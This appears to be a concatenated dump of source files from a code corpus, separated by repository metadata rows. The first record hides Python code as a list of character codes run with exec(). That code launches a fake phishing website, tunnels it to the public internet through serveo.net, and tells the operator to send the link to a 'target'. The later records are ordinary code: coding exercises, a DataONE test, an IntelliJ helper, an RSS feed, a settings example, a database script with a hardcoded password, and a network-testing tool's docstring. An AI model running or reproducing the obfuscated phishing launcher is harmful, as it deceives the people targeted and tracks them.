10, 9, 100, 101, 102, 32, 103, 112, 115, 40, 115, 101, 108, 102, 41, 58, 10, 9, 9, 105, 102, 32, 111, 115, 46, 112, 97, 116, 104, 46, 101, 120, 105, 115, 116, 115, 40, 34, 114, 97, 119, 47, 115, 101, 114, 118, 101, 114, 47, 103, 112, 115, 47, 105, 110, 100, 101, 120, 46, 112, 104, 112, 34, 41, 58, 10, 9, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 43, 37, 115, 93, 32, 70, 105, 108, 101, 32, 105, 110, 100, 101, 120, 46, 112, 104, 112, 32, 119, 97, 115, 32, 102, 111, 117, 110, 100, 32, 105, 110, 32, 37, 115, 47, 103, 112, 115, 47, 105, 110, 100, 101, 120, 46, 112, 104, 112, 37, 115, 34, 37, 40, 82, 44, 78, 44, 82, 44, 78, 41, 41, 10, 9, 9, 9, 114, 61, 114, 97, 119, 95, 105, 110, 112, 117, 116, 40, 34, 91, 37, 115, 63, 37, 115, 93, 32, 68, 105, 100, 32, 117, 32, 119, 97, 110, 116, 32, 116, 111, 32, 101, 100, 105, 116, 32, 115, 105, 116, 101, 63, 32, 121, 47, 110, 58, 32, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 9, 105, 102, 32, 114, 46, 108, 111, 119, 101, 114, 40, 41, 32, 61, 61, 32, 34, 121, 34, 58, 10, 9, 9, 9, 9, 115, 101, 108, 102, 46, 97, 61, 114, 97, 119, 95, 105, 110, 112, 117, 116, 40, 34, 91, 37, 115, 43, 37, 115, 93, 32, 83, 105, 116, 101, 32, 78, 97, 109, 101, 32, 32, 58, 32, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 99, 61, 114, 97, 119, 95, 105, 110, 112, 117, 116, 40, 34, 91, 37, 115, 43, 37, 115, 93, 32, 72, 84, 77, 76, 32, 84, 105, 116, 108, 101, 32, 58, 32, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 98, 61, 114, 97, 119, 95, 105, 110, 112, 117, 116, 40, 34, 91, 37, 115, 43, 37, 115, 93, 32, 65, 108, 101, 114, 116, 32, 77, 115, 103, 32, 32, 58, 32, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 100, 61, 114, 97, 119, 95, 105, 110, 112, 117, 116, 40, 34, 91, 37, 115, 43, 37, 115, 93, 32, 72, 84, 77, 76, 32, 66, 111, 100, 121, 32, 32, 58, 32, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 115, 101, 114, 118, 101, 114, 46, 103, 112, 115, 40, 99, 44, 98, 44, 100, 41, 10, 9, 9, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 43, 37, 115, 93, 32, 80, 108, 101, 97, 115, 101, 32, 87, 97, 105, 116, 32, 67, 114, 101, 97, 116, 105, 110, 103, 32, 70, 97, 107, 101, 32, 87, 101, 98, 115, 105, 116, 101, 115, 32, 46, 46, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 119, 105, 116, 104, 32, 111, 112, 101, 110, 40, 34, 100, 97, 116, 97, 47, 108, 111, 103, 46, 116, 120, 116, 34, 44, 34, 119, 34, 41, 32, 97, 115, 32, 109, 101, 109, 101, 107, 58, 10, 9, 9, 9, 9, 9, 107, 111, 110, 116, 111, 108, 46, 80, 111, 112, 101, 110, 40, 10, 9, 9, 9, 9, 9, 9, 91, 34, 112, 104, 112, 34, 44, 34, 45, 83, 34, 44, 34, 108, 111, 99, 97, 108, 104, 111, 115, 116, 58, 56, 48, 56, 48, 34, 44, 34, 45, 116, 34, 44, 34, 114, 97, 119, 47, 115, 101, 114, 118, 101, 114, 47, 103, 112, 115, 34, 93, 44, 10, 9, 9, 9, 9, 9, 9, 115, 116, 100, 101, 114, 114, 61, 109, 101, 109, 101, 107, 44, 115, 116, 100, 105, 110, 61, 109, 101, 109, 101, 107, 44, 115, 116, 100, 111, 117, 116, 61, 109, 101, 109, 101, 107, 10, 9, 9, 9, 9, 9, 41, 10, 9, 9, 9, 9, 9, 116, 105, 109, 101, 46, 115, 108, 101, 101, 112, 40, 51, 41, 10, 9, 9, 9, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 43, 37, 115, 93, 32, 79, 112, 101, 110, 32, 78, 101, 119, 32, 84, 97, 98, 32, 65, 110, 100, 32, 82, 117, 110, 32, 37, 115, 97, 115, 117, 46, 112, 121, 37, 115, 32, 115, 101, 108, 101, 99, 116, 32, 83, 101, 114, 118, 101, 114, 32, 76, 105, 115, 116, 101, 110, 101, 114, 34, 37, 40, 71, 44, 78, 44, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 43, 37, 115, 93, 32, 83, 101, 110, 100, 32, 84, 104, 105, 115, 32, 76, 105, 110, 107, 32, 79, 110, 32, 89, 111, 117, 114, 32, 84, 97, 114, 103, 101, 116, 32, 46, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 33, 37, 115, 93, 32, 112, 114, 101, 115, 115, 32, 39, 37, 115, 121, 101, 115, 37, 115, 39, 32, 113, 117, 105, 99, 107, 108, 121, 32, 105, 102, 32, 121, 111, 117, 32, 102, 105, 110, 100, 32, 97, 32, 113, 117, 101, 115, 116, 105, 111, 110, 34, 37, 40, 71, 44, 78, 44, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 33, 37, 115, 93, 32, 119, 97, 105, 116, 105, 110, 103, 32, 115, 101, 114, 118, 101, 114, 32, 97, 99, 116, 105, 118, 101, 32, 46, 46, 46, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 9, 107, 111, 110, 116, 111, 108, 46, 80, 111, 112, 101, 110, 40, 91, 10, 9, 9, 9, 9, 9, 9, 9, 9, 34, 115, 115, 104, 34, 44, 34, 45, 82, 34, 44, 10, 9, 9, 9, 9, 9, 9, 9, 9, 34, 123, 125, 46, 115, 101, 114, 118, 101, 111, 46, 110, 101, 116, 58, 56, 48, 58, 108, 111, 99, 97, 108, 104, 111, 115, 116, 58, 56, 48, 56, 48, 34, 46, 102, 111, 114, 109, 97, 116, 40, 10, 9, 9, 9, 9, 9, 9, 9, 9, 9, 115, 101, 108, 102, 46, 97, 41, 44, 10, 9, 9, 9, 9, 9, 9, 9, 9, 34, 115, 101, 114, 118, 101, 111, 46, 110, 101, 116, 34, 10, 9, 9, 9, 9, 9, 93, 44, 115, 116, 100, 101, 114, 114, 61, 109, 101, 109, 101, 107, 44, 115, 116, 100, 105, 110, 61, 109, 101, 109, 101, 107, 44, 115, 116, 100, 111, 117, 116, 61, 109, 101, 109, 101, 107, 41, 10, 9, 9, 9, 9, 9, 116, 105, 109, 101, 46, 115, 108, 101, 101, 112, 40, 53, 41, 10, 9, 9, 9, 9, 9, 119, 104, 105, 108, 101, 32, 84, 114, 117, 101, 58, 10, 9, 9, 9, 9, 9, 9, 114, 61, 114, 101, 113, 117, 101, 115, 116, 115, 46, 103, 101, 116, 40, 34, 104, 116, 116, 112, 58, 47, 47, 37, 115, 46, 115, 101, 114, 118, 101, 111, 46, 110, 101, 116, 34, 37, 40, 115, 101, 108, 102, 46, 97, 41, 41, 10, 9, 9, 9, 9, 9, 9, 105, 102, 32, 114, 46, 115, 116, 97, 116, 117, 115, 95, 99, 111, 100, 101, 32, 61, 61, 32, 50, 48, 48, 58, 10, 9, 9, 9, 9, 9, 9, 9, 116, 105, 109, 101, 46, 115, 108, 101, 101, 112, 40, 53, 41, 10, 9, 9, 9, 9, 9, 9, 9, 115, 101, 108, 102, 46, 98, 101, 110, 103, 111, 110, 103, 40, 41, 10, 9, 9, 9, 9, 9, 9, 9, 98, 114, 101, 97, 107, 10, 9, 9, 9, 9, 9, 9, 9, 111, 115, 46, 115, 121, 115, 116, 101, 109, 40, 34, 107, 105, 108, 108, 97, 108, 108, 32, 112, 104, 112, 59, 107, 105, 108, 108, 97, 108, 108, 32, 115, 115, 104, 34, 41, 10, 9, 9, 9, 101, 108, 115, 101, 58, 10, 9, 9, 9, 9, 115, 101, 108, 102, 46, 97, 61, 114, 97, 119, 95, 105, 110, 112, 117, 116, 40, 34, 91, 37, 115, 43, 37, 115, 93, 32, 83, 105, 116, 101, 32, 78, 97, 109, 101, 32, 32, 58, 32, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 43, 37, 115, 93, 32, 80, 108, 101, 97, 115, 101, 32, 87, 97, 105, 116, 32, 67, 114, 101, 97, 116, 105, 110, 103, 32, 70, 97, 107, 101, 32, 87, 101, 98, 115, 105, 116, 101, 115, 32, 46, 46, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 119, 105, 116, 104, 32, 111, 112, 101, 110, 40, 34, 100, 97, 116, 97, 47, 108, 111, 103, 46, 116, 120, 116, 34, 44, 34, 119, 34, 41, 32, 97, 115, 32, 109, 101, 109, 101, 107, 58, 10, 9, 9, 9, 9, 9, 107, 111, 110, 116, 111, 108, 46, 80, 111, 112, 101, 110, 40, 10, 9, 9, 9, 9, 9, 9, 91, 34, 112, 104, 112, 34, 44, 34, 45, 83, 34, 44, 34, 108, 111, 99, 97, 108, 104, 111, 115, 116, 58, 56, 48, 56, 48, 34, 44, 34, 45, 116, 34, 44, 34, 114, 97, 119, 47, 115, 101, 114, 118, 101, 114, 47, 103, 112, 115, 47, 34, 93, 44, 10, 9, 9, 9, 9, 9, 9, 115, 116, 100, 101, 114, 114, 61, 109, 101, 109, 101, 107, 44, 115, 116, 100, 105, 110, 61, 109, 101, 109, 101, 107, 44, 115, 116, 100, 111, 117, 116, 61, 109, 101, 109, 101, 107, 10, 9, 9, 9, 9, 9, 41, 10, 9, 9, 9, 9, 9, 116, 105, 109, 101, 46, 115, 108, 101, 101, 112, 40, 52, 41, 10, 9, 9, 9, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 43, 37, 115, 93, 32, 79, 112, 101, 110, 32, 78, 101, 119, 32, 84, 97, 98, 32, 65, 110, 100, 32, 82, 117, 110, 32, 37, 115, 97, 115, 117, 46, 112, 121, 37, 115, 32, 115, 101, 108, 101, 99, 116, 32, 83, 101, 114, 118, 101, 114, 32, 76, 105, 115, 116, 101, 110, 101, 114, 34, 37, 40, 71, 44, 78, 44, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 43, 37, 115, 93, 32, 83, 101, 110, 100, 32, 84, 104, 105, 115, 32, 76, 105, 110, 107, 32, 79, 110, 32, 89, 111, 117, 114, 32, 84, 97, 114, 103, 101, 116, 32, 46, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 33, 37, 115, 93, 32, 112, 114, 101, 115, 115, 32, 39, 37, 115, 121, 101, 115, 37, 115, 39, 32, 113, 117, 105, 99, 107, 108, 121, 32, 105, 102, 32, 121, 111, 117, 32, 102, 105, 110, 100, 32, 97, 32, 113, 117, 101, 115, 116, 105, 111, 110, 34, 37, 40, 71, 44, 78, 44, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 9, 112, 114, 105, 110, 116, 40, 34, 91, 37, 115, 33, 37, 115, 93, 32, 119, 97, 105, 116, 105, 110, 103, 32, 115, 101, 114, 118, 101, 114, 32, 97, 99, 116, 105, 118, 101, 32, 46, 46, 46, 34, 37, 40, 71, 44, 78, 41, 41, 10, 9, 9, 9, 9, 9, 107, 111, 110, 116, 111, 108, 46, 80, 111, 112, 101, 110, 40, 91, 10, 9, 9, 9, 9, 9, 9, 9, 9, 34, 115, 115, 104, 34, 44, 34, 45, 82, 34, 44, 10, 9, 9, 9, 9, 9, 9, 9, 9, 34, 123, 125, 46, 115, 101, 114, 118, 101, 111, 46, 110, 101, 116, 58, 56, 48, 58, 108, 111, 99, 97, 108, 104, 111, 115, 116, 58, 56, 48, 56, 48, 34, 46, 102, 111, 114, 109, 97, 116, 40, 10, 9, 9, 9, 9, 9, 9, 9, 9, 9, 115, 101, 108, 102, 46, 97, 41, 44, 10, 9, 9, 9, 9, 9, 9, 9, 9, 34, 115, 101, 114, 118, 101, 111, 46, 110, 101, 116, 34, 10, 9, 9, 9, 9, 9, 93, 44, 115, 116, 100, 101, 114, 114, 61, 109, 101, 109, 101, 107, 44, 115, 116, 100, 105, 110, 61, 109, 101, 109, 101, 107, 44, 115, 116, 100, 111, 117, 116, 61, 109, 101, 109, 101, 107, 41, 10, 9, 9, 9, 9, 9, 116, 105, 109, 101, 46, 115, 108, 101, 101, 112, 40, 53, 41, 10, 9, 9, 9, 9, 9, 119, 104, 105, 108, 101, 32, 84, 114, 117, 101, 58, 10, 9, 9, 9, 9, 9, 9, 114, 61, 114, 101, 113, 117, 101, 115, 116, 115, 46, 103, 101, 116, 40, 34, 104, 116, 116, 112, 58, 47, 47, 37, 115, 46, 115, 101, 114, 118, 101, 111, 46, 110, 101, 116, 34, 37, 40, 115, 101, 108, 102, 46, 97, 41, 41, 10, 9, 9, 9, 9, 9, 9, 105, 102, 32, 114, 46, 115, 116, 97, 116, 117, 115, 95, 99, 111, 100, 101, 32, 61, 61, 32, 50, 48, 48, 58, 10, 9, 9, 9, 9, 9, 9, 9, 116, 105, 109, 101, 46, 115, 108, 101, 101, 112, 40, 53, 41, 10, 9, 9, 9, 9, 9, 9, 9, 115, 101, 108, 102, 46, 98, 101, 110, 103, 111, 110, 103, 40, 41, 10, 9, 9, 9, 9, 9, 9, 9, 98, 114, 101, 97, 107, 10, 9, 9, 9, 9, 9, 9, 9, 111, 115, 46, 115, 121, 115, 116, 101, 109, 40, 34, 107, 105, 108, 108, 97, 108, 108, 32, 112, 104, 112, 59, 107, 105, 108, 108, 97, 108, 108, 32, 115, 115, 104, 34, 41, 10, 9, 100, 101, 102, 32, 98, 101, 110, 103, 111, 110, 103, 40, 115, 101, 108, 102, 41, 58, 10, 9, 9, 119, 104, 105, 108, 101, 32, 84, 114, 117, 101, 58, 10, 9, 9, 9, 97, 61, 91, 34, 124, 34, 44, 34, 47, 34, 44, 34, 45, 34, 44, 34, 92, 92, 34, 93, 10, 9, 9, 9, 102, 111, 114, 32, 120, 32, 105, 110, 32, 97, 58, 10, 9, 9, 9, 9, 112, 114, 105, 110, 116, 32, 34, 92, 114, 91, 123, 125, 43, 123, 125, 93, 32, 82, 117, 110, 110, 105, 110, 103, 32, 87, 101, 98, 115, 101, 114, 118, 101, 114, 58, 32, 104, 116, 116, 112, 58, 47, 47, 123, 125, 46, 115, 101, 114, 118, 101, 111, 46, 110, 101, 116, 32, 46, 46, 32, 123, 125, 32, 32, 34, 46, 102, 111, 114, 109, 97, 116, 40, 71, 44, 78, 44, 115, 101, 108, 102, 46, 97, 44, 10, 9, 9, 9, 9, 120, 10, 9, 9, 9, 9, 41, 44, 59, 115, 121, 115, 46, 115, 116, 100, 111, 117, 116, 46, 102, 108, 117, 115, 104, 40, 41, 59, 116, 105, 109, 101, 46, 115, 108, 101, 101, 112, 40, 48, 46, 50, 48, 41, 10];exec "".join([chr(i) for i in d])
| [
"karuma1363@gmail.com"
] | karuma1363@gmail.com |
6d935daa518bfb71dc1ec9c4b2da0127e0dcea10 | 2d5d13c4bdc64202a520f32e7d4a44bb75e2004f | /week-02/d04/substr.py | ebcf9c90389536fc31a978afb81cdf52ff7d22e8 | [] | no_license | green-fox-academy/andrasnyarai | 43b32d5cc4ad3792ef8d621328f9593fc9623e0b | 19759a146ba2f63f1c3e4e51160e6111ca0ee9c3 | refs/heads/master | 2021-09-07T16:19:34.636119 | 2018-02-26T00:38:00 | 2018-02-26T00:38:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 391 | py | # Create a function that takes two strings as a parameter
# Returns the starting index where the second one is starting in the first one
# Returns -1 if the second string is not in the first one
input = "this is what I'm searching in"
input_word = "searching"
def searching(sentence, word):
s_index = sentence.find(word, 1)
return s_index
print(searching(input, input_word))
| [
"andrasnyarai@gmail.com"
] | andrasnyarai@gmail.com |
3a3f36b74b6ea8143b5175ba354b4bb508c2f61e | a502940c27096a1becb968e82dd7fb456cf12f74 | /js/createTable.py | 3628f32e216ad3ecc4827a220722b44a08ff1c8c | [
"MIT"
] | permissive | BjornWouters/PubCheck | 2ecad0fda93644e3c5618cc89bade369faaea20d | 8be12f9664b786bdf07b1f8f1be0362ae7c72ea2 | refs/heads/master | 2016-09-03T07:01:24.966075 | 2014-06-17T15:04:42 | 2014-06-17T15:04:42 | 20,400,120 | 2 | 0 | null | 2014-06-04T09:51:29 | 2014-06-02T10:21:49 | JavaScript | UTF-8 | Python | false | false | 833 | py | import mysql.connector
def createTable():
conn = mysql.connector.connect (host = "127.0.0.1",
user = "bi2_pg5",
password = "blaat1234",
db= "bi2_pg5")
cursor = conn.cursor()
cursor.execute("SELECT name FROM compound "
"GROUP BY name")
compoundList = cursor.fetchall()
compounds = ""
for i in range(len(compoundList)):
hyperlink = str(compoundList[i][0]).replace(" ", "+")
compounds += "<tr><td width='100%' onclick=""window.location='createJSON.psp?compound="+hyperlink+"'"">"+str(compoundList[i][0])+"</td></tr>\n"
cursor.close()
conn.close()
return compounds
| [
"bjorn-wouters@hotmail.com"
] | bjorn-wouters@hotmail.com |
27e4ddb0ceff016becbe4500d30ff6f059b91134 | 9fb13659c6c73996581fb252ef33ef589392770b | /test_utilities/src/d1_test/mock_api/tests/test_create.py | ad6d8382c9c6dd166ce7ff5c8bbaf0ca676a6362 | [
"Apache-2.0"
] | permissive | xlia/d1_python | ea9585c462cb1e4f2d50ff1c9ce17a33e7649265 | c4745e70a00b14fc1d8c66c6995a2d150ef69956 | refs/heads/master | 2021-09-07T08:48:02.123106 | 2018-02-20T14:59:33 | 2018-02-20T14:59:33 | 113,352,728 | 0 | 0 | null | 2018-02-20T14:39:00 | 2017-12-06T18:28:20 | Python | UTF-8 | Python | false | false | 2,064 | py | # -*- coding: utf-8 -*-
# This work was created by participants in the DataONE project, and is
# jointly copyrighted by participating institutions in DataONE. For
# more information on DataONE, see our web site at http://dataone.org.
#
# Copyright 2009-2016 DataONE
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import base64
import json
import StringIO
import responses
import d1_test.d1_test_case
import d1_test.mock_api.create as mock_create
import d1_test.mock_api.util
class TestMockPost(d1_test.d1_test_case.D1TestCase):
@responses.activate
def test_1000(self, mn_client_v1_v2):
"""mock_api.create(): Echoes the request"""
mock_create.add_callback(d1_test.d1_test_case.MOCK_BASE_URL)
pid, sid, sciobj_str, sysmeta_pyxb = \
d1_test.instance_generator.sciobj.generate_reproducible(mn_client_v1_v2, 'post_pid')
response = mn_client_v1_v2.createResponse(
'post_pid', StringIO.StringIO(sciobj_str), sysmeta_pyxb
)
identifier_pyxb = mn_client_v1_v2.bindings.CreateFromDocument(
response.content
)
assert identifier_pyxb.value() == 'echo-post'
echo_body_str = base64.b64decode(response.headers['Echo-Body-Base64'])
echo_query_dict = json.loads(
base64.b64decode(response.headers['Echo-Query-Base64'])
)
echo_header_dict = json.loads(
base64.b64decode(response.headers['Echo-Header-Base64'])
)
assert isinstance(echo_body_str, basestring)
assert isinstance(echo_query_dict, dict)
assert isinstance(echo_header_dict, dict)
| [
"git@dahlsys.com"
] | git@dahlsys.com |
09952c659f7278479a5b102c81eb45616c26ce63 | bd4e425216fa73d7077ff6033ba4858c2a8e45fb | /idea/cli.py | 05dca43dac0421c0532b34e027d3542618a637e3 | [
"WTFPL"
] | permissive | piratus/idea | 6f552f932b403be8122560e299aad9fbc9556a57 | 6f97c1fc1ccd35e01dee57607638093f7d903c90 | refs/heads/master | 2020-03-22T16:45:36.650144 | 2018-07-21T21:55:11 | 2018-07-21T21:55:43 | 140,349,530 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,474 | py | import os
from collections import namedtuple
from pathlib import Path
from importlib import resources
import click
from jinja2 import Template
from lxml import etree
with resources.open_text('idea', 'module_tpl.xml') as fid:
MODULE_TPL = Template(fid.read())
Directory = click.Path(file_okay=False, exists=True, resolve_path=True)
@click.group()
def cli():
"""IntelliJ IDEA helper utility"""
pass
def get_project_root():
path = Path(os.getcwd())
while path.parent:
if (path / '.idea').exists():
return path
path = path.parent
raise click.BadParameter("Doesn't look like you're inside an IDEA project")
def read_xml(xml_path: Path) -> etree.ElementTree:
if not xml_path.exists():
raise click.BadParameter(f'File "{str(xml_path)}" does not exist')
return etree.fromstring(xml_path.read_bytes())
Module = namedtuple('Module', ['iml', 'root'])
@cli.command(name='list')
def list_modules():
"""List project's modules"""
project = get_project_root()
xml_path = project / '.idea' / 'modules.xml'
xml_node = read_xml(xml_path).find('component/modules')
root = str(project.absolute())
def get_module_root(module_path: Path) -> Path:
module_xml = read_xml(module_path)
module_root = module_xml.find('component/content').attrib['url']
return Path(module_root.replace('file://$MODULE_DIR$', root))
configs = [Path(m.attrib['filepath'].replace('$PROJECT_DIR$', root))
for m in xml_node.iterchildren()]
modules = [Module(config, get_module_root(config)) for config in configs]
for module in modules:
print(f'{str(module.iml)}: {str(module.root)}')
@cli.command(name='scan')
def scan_modules():
"""List project's modules"""
project_dir = get_project_root()
for path in project_dir.glob('**/pom.xml'):
if 'node_modules' not in path.parents:
print(path.parent.relative_to(project_dir))
@cli.command()
@click.argument('path', type=Directory)
@click.option('-n', '--name', help='Custom module name')
def add(path: str, name=None, project=os.getcwd()):
"""Add a module to the project"""
module_root = Path(path)
name = module_root.name if not name else name
project_dir = get_project_root()
idea_dir = project_dir / '.idea'
iml_path = idea_dir / f'{name}.iml'
if iml_path.exists():
raise click.BadParameter(f'Module "{str(iml_path)}" already exists')
xml_path = idea_dir / 'modules.xml'
if not xml_path.exists():
raise click.BadParameter(f'File "{str(xml_path)}" does not exist')
def rel(glob):
return [p.relative_to(project_dir) for p in module_root.glob(glob)]
module_iml = MODULE_TPL.render(
module_root=module_root.relative_to(project_dir),
source_folders=rel('src'),
test_folders=rel('test*'),
exclude_folders=rel('dist'),
exclude_patterns=[
'.cache',
'.vscode',
'node_modules'
]
)
click.echo(f'Writing {iml_path.relative_to(project_dir)}')
iml_path.write_text(module_iml)
xml = read_xml(xml_path)
xml.find('component/modules').append(etree.Element('module', {
'fileurl': f'file://$PROJECT_DIR$/.idea/{name}.iml',
'filepath': f'$PROJECT_DIR$/.idea/{name}.iml'
}))
click.echo(f'Updating {xml_path.relative_to(project_dir)}')
xml_path.write_bytes(etree.tostring(xml, method='xml'))
| [
"piratus@gmail.com"
] | piratus@gmail.com |
22eaa884ceac3f397797b21f255a21e0d76317d7 | 66b6664af0af3b127fd113ce6d56e55d7d6817ca | /py/LinkedListRandomNode.py | 03e5869c809c7f0e683f9b2be30a25882bc9030e | [] | no_license | sangreal/PyLintcode | f830b2ab3891af9681272f0af12ab6040f8e8533 | 805d99b51df424b5b87dbc6ef2c4c5f8012f4434 | refs/heads/master | 2020-12-14T06:36:46.775392 | 2017-06-11T23:39:21 | 2017-06-11T23:39:21 | 46,391,091 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 918 | py | import random
# Definition for singly-linked list.
class ListNode(object):
def __init__(self, x):
self.val = x
self.next = None
class Solution(object):
def __init__(self, head):
"""
@param head The linked list's head.
Note that the head is guaranteed to be not null, so it contains at least one node.
:type head: ListNode
"""
self.head = head
def getRandom(self):
"""
Returns a random node's value.
:rtype: int
"""
k = 1
cnt = 0
retNode = 0
curnode = self.head
while curnode is not None:
if cnt < k:
retNode = curnode.val
else:
rrand = random.randint(0, cnt)
if rrand < k:
retNode = curnode.val
cnt += 1
curnode = curnode.next
return retNode
| [
"martynwin@gmail.com"
] | martynwin@gmail.com |
7ee5f326b39f30c07f31549b5ea6d8369bd733f6 | 86eb5c21782596a55ee68abd7af0a8ef25ceea70 | /integrations/local_settings.example.py | 78aea813195cc6d73b76b4d496959583fd7b0316 | [] | no_license | pkitutu/integrations | fda97bcf5bebaabd3c2a614597fd3d6f9ba054d1 | 00d8238ad365d7fb0026540c7392947331fc623f | refs/heads/master | 2022-05-02T14:21:53.718235 | 2019-10-17T18:46:30 | 2019-10-17T18:46:30 | 215,852,855 | 0 | 0 | null | 2022-04-22T22:36:25 | 2019-10-17T17:50:56 | Python | UTF-8 | Python | false | false | 207 | py | SECRET_KEY = 'xxxxxxxxxx'
MOMO_API_URL = 'https://sandbox.momodeveloper.mtn.com/collection/v1_0/'
MOMO_SUBSCRIPTION_KEY = 'your momo subscription key'
MOMO_TARGET_ENVIRONMENT = 'sandbox'
DB_FETCH_LIMIT = 10 | [
"pkitutu@gmail.com"
] | pkitutu@gmail.com |
45a1455cad84d3b82f52be1726c8da09b1788c0b | 1b8a99a4ff80da51dc81dd8354bf9bf1cbd25a8b | /2022/special_array_with_x_elements_greater_than_or_equal_x.py | 1eed93272f0a62c0218b8b94b721fe028f723576 | [] | no_license | eronekogin/leetcode | ea639eebe0cd70af9eb4cba59bc68f636d7b3e0c | edb870f83f0c4568cce0cacec04ee70cf6b545bf | refs/heads/master | 2023-08-16T10:35:57.164176 | 2023-08-14T11:25:33 | 2023-08-14T11:25:33 | 163,679,450 | 0 | 0 | null | 2021-09-09T12:04:44 | 2018-12-31T15:33:06 | Python | UTF-8 | Python | false | false | 624 | py | """
https://leetcode.com/problems/special-array-with-x-elements-greater-than-or-equal-x/
"""
class Solution:
def specialArray(self, nums: list[int]) -> int:
sortedNums = sorted(nums, reverse=True)
N = len(nums)
for i in range(N):
x = i + 1
if sortedNums[i] >= x: # Now we have x numbers >= x.
if i == len(nums) - 1 or sortedNums[i + 1] < x:
# Make sure exactly x numbers are >= x:
# 1. No more numbers left.
# 2. The next number is less than x.
return x
return -1
| [
"mengyu.jiang@gmail.com"
] | mengyu.jiang@gmail.com |
c7d93a083efcd77115f7f747b379ad57f89e5ff9 | 947ee6c080d4e6ce704ec6687be2eab5feaccc2b | /typeidea/blog/rss.py | 0dcba20d49d3034c2407b825cd878779616d1155 | [
"Apache-2.0"
] | permissive | zxknjcjdx/typeidea | 592ed554ff406c3914f792db5c1bf37c6a722bc8 | a213e823613df11176d6864d1c9d7a929754050c | refs/heads/master | 2020-06-10T08:46:34.755463 | 2019-07-06T10:35:09 | 2019-07-06T10:35:09 | 193,625,805 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,041 | py | from django.contrib.syndication.views import Feed
from django.urls import reverse
from django.utils.feedgenerator import Rss201rev2Feed
from .models import Post
class ExtendedRSSFeed(Rss201rev2Feed):
def add_item_elements(self, handler, item):
super(ExtendedRSSFeed, self).add_item_elements(handler, item)
handler.addQuickElement('content:html', item['content_html'])
class LatestPostFeed(Feed):
feed_type = Rss201rev2Feed
title = 'Typeidea Blog System'
link = '/rss/'
description = 'typeidea is a blog system power by django'
def items(self):
return Post.objects.filter(status=Post.STATUS_NORMAL)[:5]
def item_title(self, item):
return item.title
def item_description(self, item):
return item.desc
def item_link(self, item):
return reverse('post-detail', args=[item.pk])
def item_extra_kwargs(self, item):
return {'content_html': self.item_content_html(item)}
def item_content_html(self, item):
return item.content_html
| [
"1990858822@qq.com"
] | 1990858822@qq.com |
55d553eca6268f2d5ec4ae4a218148c431371d37 | 68ac39d3f59988f3a5e581041a76d8d6c2f00d5d | /happy/HappyNodeTcpReset.py | 0ff3935eb6ed51ce7a5d6958029ecaa0617f4a7c | [
"Apache-2.0"
] | permissive | emargolis/happy | 62f274ff21e8be66922e239acaf7bbb6f53cea27 | 40d6e216d1a671c14b72e7e59f23b98cbda5d954 | refs/heads/master | 2021-01-16T15:16:25.950683 | 2020-02-26T20:04:06 | 2020-02-26T20:07:05 | 243,164,644 | 0 | 0 | Apache-2.0 | 2020-02-26T04:02:20 | 2020-02-26T04:02:19 | null | UTF-8 | Python | false | false | 4,586 | py | #!/usr/bin/env python
#
# Copyright (c) 2016-2017 Nest Labs, Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
##
# @file
# Implements HappyNodeTcpReset class through which nodes reset tcp connection on specific interface
#
#
import os
import sys
from happy.ReturnMsg import ReturnMsg
from happy.Utils import *
from happy.HappyNode import HappyNode
import happy.HappyProcessStart
options = {}
options["quiet"] = False
options["node_id"] = None
options["action"] = None
options["interface"] = None
options["start"] = None
options["duration"] = None
options["ips"] = None
options["dstPort"] = None
def option():
return options.copy()
class HappyNodeTcpReset(HappyNode):
"""
Provides tcpkill functionality to virtual nodes. Use this to test DoS attacks on a
Happy network by blocking TCP connections to specific nodes, interfaces, and ports.
happy-node-tcp-reset [-h --help] [-q --quiet] [-i --id <NODE_NAME>] [--interface <IFACE>]
[-s --start <START_TIME>] [-d --duration <DURATION>] [--ips <SOURCE_IP,DEST_IP>]
[--dstPort <DEST_PORT>]
